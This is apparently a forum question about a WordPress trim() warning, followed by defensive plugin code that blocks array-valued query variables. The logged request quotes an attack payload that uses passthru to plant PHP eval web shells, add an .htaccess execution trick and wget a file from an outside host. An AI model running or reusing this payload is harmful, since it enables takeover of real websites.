My logs started filling up with this warning...
Which line?
Warning: trim() expects parameter 1 to be string, array given in /wp-includes/class-wp-query.php line 756
So, to see what was going on, I added...
public function parse_query( $query = '' ) {
    ...
    $qv['name'] = trim( $qv['name'] );
I came back to check the log and saw that an array is being passed through here...
// Debug an attack: when something other than a string reaches trim(),
// log the referer and the full call stack, then stop the request.
if ( ! is_string( $qv['name'] ) ) {
    // HTTP_REFERER is optional and attacker-controlled; guard against it being unset.
    $referer = isset( $_SERVER['HTTP_REFERER'] ) ? $_SERVER['HTTP_REFERER'] : '(none)';
    error_log( '$_SERVER[HTTP_REFERER] = ' . $referer );
    error_log( print_r( debug_backtrace(), true ) );
    exit();
}
$qv['name'] = trim( $qv['name'] );
You may have noticed that I logged the request, and the result was...
[query_vars] => Array
(
[name] => Array
(
[#post_render] => Array
(
[0] => passthru
)
[#type] => markup
[#markup] => echo \'Vuln!! patch it Now!\' > vuln.htm; echo \'Vuln!!<?php @eval($_POST[\'pass\']) ?>\'> sites/default/files/vuln.php; echo \'Vuln!!<?php @eval($_POST[\'pass\']) ?>\'> vuln.php; cd sites/default/files/; echo \'AddType application/x-httpd-php .jpg\' > .htaccess; wget \'http://40k.waszmann.de/Deutsch/images/up.php\'
)
Looks like it's being spoofed.
The full call stack dump can be found here: https://paste.ee/p/0Vd49
How can I prevent this junk from getting through? Is there any filter I can use to do some checks and block these calls?
Thanks!
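One way to answer the question above, as an added example that is not the poster's code and not part of WordPress core: a must-use plugin that hooks the core `request` filter, which `WP::parse_request()` applies to the merged GET/POST query vars before `WP_Query::parse_query()` calls `trim()` on `$qv['name']`. The list of scalar-only query vars and the `example_` function names are assumptions made for this example; the filter, `wp_die()`, and `add_filter()` are real WordPress APIs.

```php
<?php
/**
 * Plugin Name: Reject array-valued scalar query vars (added example)
 *
 * Place this file in wp-content/mu-plugins/ so it loads before themes and
 * ordinary plugins. It runs on the core 'request' filter and refuses any
 * request that supplies an array where WordPress expects a single string,
 * which is exactly what produced the "trim() expects parameter 1 to be
 * string, array given" warning in class-wp-query.php.
 */

// Query vars that WordPress only ever treats as single strings. Receiving an
// array for any of these means the request was crafted, not produced by a
// normal link. This list is an assumption for the example; extend it to
// match the rewrite rules and custom query vars on your site.
const EXAMPLE_SCALAR_ONLY_QUERY_VARS = array(
    'name', 'pagename', 's', 'p', 'page_id', 'attachment',
    'author_name', 'm', 'year', 'monthnum', 'day',
);

/**
 * Return the names of query vars that arrived as non-scalars (arrays) but
 * must be scalars. Kept separate from the filter so it can be unit-tested.
 *
 * @param array $query_vars  Query vars as passed to the 'request' filter.
 * @param array $scalar_only Vars that must be scalar.
 * @return array Offending var names; empty when the request is clean.
 */
function example_find_array_query_vars( array $query_vars, array $scalar_only = EXAMPLE_SCALAR_ONLY_QUERY_VARS ) {
    $bad = array();
    foreach ( $scalar_only as $var ) {
        if ( isset( $query_vars[ $var ] ) && ! is_scalar( $query_vars[ $var ] ) ) {
            $bad[] = $var;
        }
    }
    return $bad;
}

/**
 * 'request' filter callback: log the request and answer 400 instead of
 * letting the array reach WP_Query::parse_query() and trim().
 *
 * @param array $query_vars
 * @return array Unchanged query vars when the request is clean.
 */
function example_reject_array_query_vars( $query_vars ) {
    $bad = example_find_array_query_vars( $query_vars );
    if ( empty( $bad ) ) {
        return $query_vars;
    }

    // Record enough context to investigate later. The referer header is
    // optional and attacker-controlled, so never assume it is present.
    $referer = isset( $_SERVER['HTTP_REFERER'] ) ? $_SERVER['HTTP_REFERER'] : '(none)';
    $ip      = isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : '(unknown)';
    $uri     = isset( $_SERVER['REQUEST_URI'] ) ? $_SERVER['REQUEST_URI'] : '(unknown)';
    error_log( sprintf(
        'Rejected request: array supplied for query var(s) [%s] from %s, referer %s, uri %s',
        implode( ',', $bad ),
        $ip,
        $referer,
        $uri
    ) );

    // Stop here with a 400; nothing downstream should see these values.
    wp_die( 'Bad request.', 'Bad request', array( 'response' => 400 ) );
}

add_filter( 'request', 'example_reject_array_query_vars' );
```

The check deliberately targets only vars that must be scalar: WordPress legitimately accepts arrays for some public query vars (for example `post_type`), so a blanket "no arrays" rule would break valid requests. The dump in the question uses Drupal-style `#post_render` keys and a `sites/default/files` path, which WordPress does not interpret; the filter's job is to keep such requests out of `WP_Query` and out of the error log, and the `error_log()` line gives you the source address and URI to feed into a firewall or fail2ban rule.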